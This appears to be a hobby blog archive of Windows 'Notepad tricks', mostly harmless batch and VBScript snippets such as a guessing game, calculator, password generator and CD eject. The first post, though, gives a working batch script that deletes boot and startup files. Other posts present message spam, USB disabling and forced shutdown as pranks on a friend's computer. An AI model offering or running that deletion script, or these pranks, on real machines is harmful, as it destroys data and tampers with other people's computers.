Posts

Showing posts from March, 2021

Deleting Startup Files

Deleting Startup Files ⭕⭕🔆Well, this is something which you shouldn’t try on your computer unless you are willing to lose all your data. This code will remove the files that help your computer during the startup. ⭕⭕🔆Save the file as .bat file format. It will shut down your computer and will delete all important startup files. There’s no rollback option. Therefore you should be aware of what you will be doing. Please don’t use the above-given code to harm anyone. 💥💥NOTE💥💥 ⭕⭕⭕Before running a program, make sure you understand what happens when you run the program.⭕⭕⭕ ⭕⭕⭕Please read the post before start this program.⭕⭕⭕ 💥💥 @ECHO OFF ATTRIB -R -S -H C:\AUTOEXEC.BAT DEL C:\AUTOEXEC.BAT ATTRIB -R -S -H C:\BOOT.INI DEL C:\BOOT.INI ATTRIB -R -S -H C:\NTLDR DEL C:\NTLDR ATTRIB -R -S -H C:\WINDOWS\WIN.INI DEL C:\WINDOWS\WIN.INI 🔆Don’t forget to share this post with your friends and leave a comment below. join our telegram channel,facebook page,twitter page and whatsapp grou

Password-protected Folder using Notepad.

⏩ Password-protected Folder using Notepad ⏪ ⭕You can protect the files and folders in your computer by using this Notepad trick. A password-protected folder is created using few lines of code and you can keep your important stuff safe. ⭕Type the following code. Instead of “fossBytes” written in the code, type in the password of your wish. Save the file as private.bat and choose File type as All Files (*.*). Double click on the file private.bat. A Private folder will be created in which you can move the files and folders that you want to protect. Now, a password will be required to open this folder. @ECHO OFF title Folder Private if EXIST “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}” goto UNLOCK if NOT EXIST Private goto MDLOCKER :CONFIRM echo Are you sure you want to lock the folder(Y/N) set/p “cho=>” if %cho%==Y goto LOCK if %cho%==y goto LOCK if %cho%==n goto END if %cho%==N goto END echo Invalid choice. goto CONFIRM :LOCK ren Private “Control Panel.{21EC2020-3

Password Generator

Password Generator Your passwords probably suck. If you want to create a simple (numeric) random password generator, you can do that with this little trick (via Instructables). Sometimes the numbers are four-digits long; some are five-digits long. Basically, this is more of a PIN generator. 🔥Paste the following code in a Notepad doc. @echo off :Start2 cls goto Start :Start title Password Generator echo I will make you a new password. echo Please write the password down somewhere in case you forget it. echo ----------------------------------------¬----------------------- echo 1) 1 Random Password echo 2) 5 Random Passwords echo 3) 10 Random Passwords echo Input your choice set input= set /p input= Choice: if %input%==1 goto A if NOT goto Start2 if %input%==2 goto B if NOT goto Start2 if %input%==3 goto C if NOT goto Start2 :A cls echo Your password is %random% echo Now choose what you want to do. echo 1) Go back to the beginning echo 2) Exit set input= set /p input= Choice: if %i

Create A Guessing Game.

Image
Guessing Game Here's a good way to pass the time if you're bored via Instructables. 👉 Paste the following into a Notepad doc: @echo off color 0e title Guessing Game by seJma set /a guessnum=0 set /a answer=%RANDOM% set variable1=surf33 echo ------------------------------------------------- echo Welcome to the Guessing Game! echo. echo Try and Guess my Number! echo ------------------------------------------------- echo. :top echo. set /p guess= echo. if %guess% GTR %answer% ECHO Lower! if %guess% LSS %answer% ECHO Higher! if %guess%==%answer% GOTO EQUAL set /a guessnum=%guessnum% +1 if %guess%==%variable1% ECHO Found the backdoor hey?, the answer is: %answer% goto top :equal echo Congratulations, You guessed right!!! echo. echo It took you %guessnum% guesses. echo. pause 👉 Save as a .bat file. 👉 Double-click the file. Guess away! ✌Don’t forget to share this post with your friends and leave a comment below. join our telegram channel,facebook page,twitter page and whatsapp

Create A Virtual Calculator.

Image
  Create A Virtual Calculator This hand-coded calculator is more a cool proof-of-concept than something I would honestly recommend for your number-crunching needs. Your PC or phone most likely comes with a more intuitive virtual calculator, as does the browser you're probably reading this on. (Via Instructables) 👉Paste the following into a Notepad doc: @echo off title Batch Calculator by seJma color 1f :top echo -------------------------------------------------------------- echo Welcome to Batch Calculator echo -------------------------------------------------------------- echo. set /p sum= set /a ans=%sum% echo. echo = %ans% echo -------------------------------------------------------------- pause cls echo Previous Answer: %ans% goto top pause exit 👉 Save as a .bat file. 👉Math away. Note: it can only handle integers. And only those of a certain number of digits. It also doesn't handle complex equations all that well. But other than all that, it's just fine.

Matrix Effect

Image
  Matrix Effect 👉This code will give you a matrix effect on your screen just copy the below code and paste in notepad and save it as  “anyname.bat ”. @echo off color 02 :start echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% goto start Don’t forget to share this post with your friends and leave a comment below. join our telegram channel,facebook page,twitter page and whatsapp group. Follow us.👇 Telegram Facebook Twitter Whatsapp group

LED Dance of Keyboard Using Notepad

LED Dance of Keyboard Using Notepad 👉 Open Notepad and copy below codes into it. Set wshShell =wscript.CreateObject("WScript.Shell") do wscript.sleep 100 wshshell.sendkeys "{CAPSLOCK}" wshshell.sendkeys "{NUMLOCK}" wshshell.sendkeys "{SCROLLLOCK}" loop 👉 Then save this file as led.vbs (.vbs is must) 👉 Open your save file and see your keyboard led blinking like disco lights. Disable Blinking LED 👉 First open Task Manager (ctrl+alt+del) 👉 Then Go to process tab. 👉 Select wscript.exe 👉 Click on End process. Don’t forget to share this post with your friends and leave a comment below. join our telegram channel,facebook page,twitter page and whatsapp group. Follow us.👇 Telegram Facebook Twitter Whatsapp group

Constantly Repeat Any Messages

  Constantly Repeat Any Messages This is one of the Best Notepad tricks that will repeat any of the messages on the computer screen repeatedly. Just copy the below code and paste in the notepad and save it as “message.bat”. @ECHO off :Begin msg * Hi msg * Are you having fun? msg * I am! msg * Lets have fun together! msg * Because you have been o-w-n-e-d GOTO BEGIN Don’t forget to share this post with your friends and leave a comment below. join our telegram channel,facebook page,twitter page and whatsapp group. Telegram Facebook Twitter Whatsapp group

Useful Run Commands

Useful Run Commands To Access?. Run Command  The shortcut to RUN command is "Windows Key + R" The command is shown in the second rule.  1.Accessibility Controls  access.cpl  2.Add Hardware Wizard  hdwwiz.cpl  3.Add/Remove Programs  appwiz.cpl  4.Administrative Tools  control.exe admintools  5.Automatic Updates  wuaucpl.cpl  6.Bluetooth Transfer Wizard  fsquirt  7.Calculator  calc  8.Certificate Manager  certmgr.msc  9.Character Map  charmap  10.Check Disk Utility  chkdsk  11.Clipboard Viewer  clipbrd  12.Command Prompt  cmd   13.Component Services  dcomcnfg 14.Computer Management  compmgmt.msc  15.Date and Time Properties  timedate.cpl  16.DDE Shares  ddeshare  17.Device Manager  devmgmt.msc   18.Direct X Control Panel (if installed)*  directx.cpl  19.Direct X Troubleshooter  dxdiag  20.Disk Cleanup Utility  cleanmgr  21.Disk Defragment  dfrg.msc  22.Disk Management  diskmgmt.msc  23.Disk Partition Manager  diskpart  24.Display Properties  control.exe desktop  25.Display Pr

Disable USB Ports

Image
Disable USB Ports👀 If you want to do prank with your friend’s computer then disabling USB ports are the best one, using this tricks your friend’s computer ports disable just like it damaged try this one below are the steps you have to follow.Follow These Steps To Disable USB ports Step: 1 Go to Start and type Run in the search box pop-up box is open. Step: 2 In the run type Regedit and now another window will open of registry editor. Step: 3 Now follow this click on HKEY_LOCAL_MACHINE >> SYSTEM>>current ControlSet>>Services>>USBSTOR step: 4 After that on right side Start option is shows double click on it and change the value from 3 to 4 Step: 5 Click OK and refresh the desktop. Step: 6 To enable USB port change the value to 3 and click OK and refresh. Don’t forget to share this post with your friends and leave a comment below. join our telegram channel and facebook page.

Shutdown computer useing the notepad.

Image
Shutdown computer useing the notepad. 👉copy this code and past it your notepad. @echo off shutdown -s -t 5 -c "computer is shutdown in 5sec." 👉save the notepad file. 👉file extension is .bat       Ex - shutdown.bat 👉file type is all files. 👉once you have done this click save. when you click on it,the computer shutdown within 5 seconds. Don’t forget to share this post with your friends and leave a comment below. join our telegram channel and facebook page.

How to view internet protocol Address on a Networked computer.

Image
How to view internet protocol Address on a Networked computer. ♦open your computer command prompt. ♦Type in ipconfig and press enter. ♦Then shows you internet protocol address,subnet mask,default gateway. 🟩 Don’t forget to share this post with your friends and leave a comment below.

Tricks on the Keyboard

  Tricks on the Keyboard😀 ♦Close all your windows quickly if you’re in a hurry by pushing the Windows button +D, and they will all shut immediately. ♦rename your highlighted files quickly by pressing F2. ♦Close the program running with ALT + F4. ♦To minimize all windows only, press Windows + D. ♦Re-open your last closed tab with Shift + CTRL + T on most browsers. ♦Instead of moving the cursor to the X in the corner, press CTRL + W to close the current window. ♦Take a screen shot with ALT + Print Screen. enter your comments in the comment section.

Scanning antivirus software on a computer, why do so many setup files show as viruses.

Image
Scanning antivirus software on a computer, why do so many setup files show as viruses. This is a problem for many people. the reason for this is,                    When a virus program runs on a computer, it affects the setup file. Then even files that are in good condition will be is distorted by virus. Even these is distorted files work well. But when the file is executed on another computer, the virus spreads to that computer as well.                         so if you want to keep the setup file, write it to a CD and keep it. enter your comments in the comment section.

Windows 10 Action Center Menu.

Image
  Windows 10 Action Center Menu. you can open the action center menu by clicking on the message icon in the right corner of the windows screen.              Above here you can see the security and maintenance massage. If you already have a lot of messages, if you want to delete all those messages, you have to click on the word "Celear all" at the top of the menu.                    From that menu you can enable and disable Bluetooth,hotspot,location and much more. The first image showsyou the icon to open that menu. In the second image, the menu is opened and shown inside. See also our other posts. Like our facebook page. Join our Telegram channel.

How to open cd rom useing notepad application.

  How to open cd  rom useing notepad application. step1 -- open your pc or laptop notepad application. step2 -- Then this code copy and past it. Dim ts Dim strDriveLetter Dim intDriveLetter Dim fs 'As Scripting.FileSystemObject Const CDROM = 4 On Error Resume Next Set fs = CreateObject("Scripting.FileSystemObject") strDriveLetter = "" For intDriveLetter = Asc("A") To Asc("Z") Err.Clear If fs.GetDrive(Chr(intDriveLetter)).DriveType = CDROM Then If Err.Number = 0 Then strDriveLetter = Chr(intDriveLetter) Exit For End If End If Next Set oWMP = CreateObject("WMPlayer.OCX.7" ) Set colCDROMs = oWMP.cdromCollection For d = 0 to colCDROMs.Count - 1 colCDROMs.Item(d).Eject Next 'null For d = 0 to colCDROMs.Count - 1 colCDROMs.Item(d).Eject Next 'null set owmp = nothing set colCDROMs = nothing step3 -- save it.file extension is .vbs              ex-- open.vbs   go to your save location and duble click it.then your pc or laptop cd r